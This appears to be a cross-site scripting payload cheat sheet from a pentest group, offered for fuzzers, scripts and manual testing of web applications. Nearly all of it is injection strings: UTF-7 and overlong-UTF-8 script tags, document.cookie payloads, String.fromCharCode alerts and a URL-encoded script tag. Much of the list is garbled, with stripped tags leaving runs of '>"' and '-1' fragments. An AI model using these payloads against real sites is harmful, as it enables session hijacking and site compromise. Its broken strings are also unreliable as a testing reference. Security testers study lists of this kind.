_________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have some good results you can use the following list with automatic scripts, software or for manually pentesting. This list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon. Note: This is a technical attack sheet for cross site penetrationtests. Cross Site Scripting Strings with TAG:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;};
< ;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >" >" >" >" >" >" >" >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1
-1
-1
-1 -1 -1 -1exp/* -1 -1 -1 -1 -1 -1 -1]] -1 -1 -1document.cookie=true'); ?> -1 +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1 -1
-1 -1 -1 -1 -1& -1&{document.cookie=true;}; -1 -1 -1 -1 -1 -1 -1
-1
-1
-1
-1 -1 -1 -1< -1 -1 -1 -1 -1 -1; -1
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >" Cross Site Scripting Strings Restriction Bypass String to Charcode String:fr om.Char.Code ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'> '';!--"=&{()} Cross Site Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E Cross Site Scripting Strings via Console: set vlan name 1337 set system name